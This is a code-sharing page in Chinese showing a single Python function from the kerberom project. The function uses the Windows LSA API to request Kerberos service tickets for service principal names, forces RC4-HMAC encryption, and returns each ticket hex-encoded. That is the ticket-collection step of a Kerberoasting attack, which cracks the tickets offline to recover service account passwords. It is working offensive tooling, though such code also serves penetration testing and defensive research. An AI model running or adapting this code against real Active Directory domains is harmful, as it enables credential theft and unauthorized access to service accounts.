rich.py 文件源码

python
阅读 27 收藏 0 点赞 0 评论 0
项目:kerberom 作者: Synacktiv 项目源码 文件源码 
def Get_TGS(hLsaConnection, dwKerberosAuthenticationPackageId, SPNentry):
    LPTR = (0x0000 | 0x0040)

    list_of_target = SPNentry["serviceprincipalname"].split(";")

    for target in list_of_target:
        szSPN = create_unicode_buffer(target.lower())
        dwSPNSize = USHORT((len(target)) * sizeof(wchar_t))

        dwTicketPayloadSize = DWORD(sizeof(KERB_RETRIEVE_TKT_REQUEST) + dwSPNSize.value)

        KerbRetrieveEncodedTicketMessage = 8
        KERB_ETYPE_RC4_HMAC_NT = 23
        KERB_RETRIEVE_TICKET_DONT_USE_CACHE = (0x1)

        dwKerbRetrieveTicketRequestAddress = windll.kernel32.LocalAlloc(LPTR, dwTicketPayloadSize.value)
        pKerbRetrieveTicketRequest = cast(dwKerbRetrieveTicketRequestAddress, PKERB_RETRIEVE_TKT_REQUEST)

        pKerbRetrieveTicketRequest.contents.MessageType = KerbRetrieveEncodedTicketMessage
        # current logon session context
        pKerbRetrieveTicketRequest.contents.LogonID = 0
        # TargetName
        pKerbRetrieveTicketRequest.contents.TargetName.Length = USHORT(dwSPNSize.value)
        pKerbRetrieveTicketRequest.contents.TargetName.MaximumLength = USHORT(dwSPNSize.value + sizeof(wchar_t))

        dwKerbRetrieveTicketRequestBufferAddress = dwKerbRetrieveTicketRequestAddress + sizeof(KERB_RETRIEVE_TKT_REQUEST)
        memmove(dwKerbRetrieveTicketRequestBufferAddress, szSPN, pKerbRetrieveTicketRequest.contents.TargetName.Length)
        pKerbRetrieveTicketRequest.contents.TargetName.Buffer = cast(dwKerbRetrieveTicketRequestBufferAddress, PWSTR)

        pKerbRetrieveTicketRequest.contents.TicketFlags = ULONG(0)
        pKerbRetrieveTicketRequest.contents.CacheOptions = KERB_RETRIEVE_TICKET_DONT_USE_CACHE
        pKerbRetrieveTicketRequest.contents.EncryptionType = KERB_ETYPE_RC4_HMAC_NT
        pKerbRetrieveTicketRequest.contents.CredentialsHandle = SecHandle()

        pKerbRetrieveTicketResponse = PVOID()
        pKerbRetrieveTicketResponse = cast(pKerbRetrieveTicketResponse, PKERB_RETRIEVE_TKT_RESPONSE)
        dwProtocolStatus = DWORD(0)

        status = LsaCallAuthenticationPackage(hLsaConnection, dwKerberosAuthenticationPackageId, pKerbRetrieveTicketRequest, dwTicketPayloadSize, byref(pKerbRetrieveTicketResponse), byref(dwTicketPayloadSize), byref(dwProtocolStatus))

        windll.kernel32.LocalFree(pKerbRetrieveTicketRequest)

        if status == STATUS_SUCCESS and dwProtocolStatus.value == STATUS_SUCCESS and dwTicketPayloadSize.value != 0:
            pKerbRetrieveTicketResponse = cast(pKerbRetrieveTicketResponse, PKERB_RETRIEVE_TKT_RESPONSE)
            pEncodedTicket = pKerbRetrieveTicketResponse.contents.Ticket.EncodedTicket
            dwEncodedTicketSize = pKerbRetrieveTicketResponse.contents.Ticket.EncodedTicketSize

            Ticket = ""
            for i in range(dwEncodedTicketSize):
                Ticket += hex(pEncodedTicket[i]).replace("0x",'').zfill(2)

            LsaFreeReturnBuffer(pKerbRetrieveTicketResponse)

            return Ticket
        else:
            print " [-] Cannot retrieve ticket for account '%s' and SPN '%s', status: %s ; protocolstatus: %s" % (SPNentry["samaccountname"], target, hex(status), hex(dwProtocolStatus.value))
            print " [+] Trying the next one."
    print "[-] Could not retrieve any ticket for account '%s' and the list of SPN: '%s'" % (SPNentry["samaccountname"], SPNentry["serviceprincipalname"])
    return 0
您未登录,请先登录后再评论
评论列表
文章目录


问题


面经


文章

微信
公众号

扫码关注公众号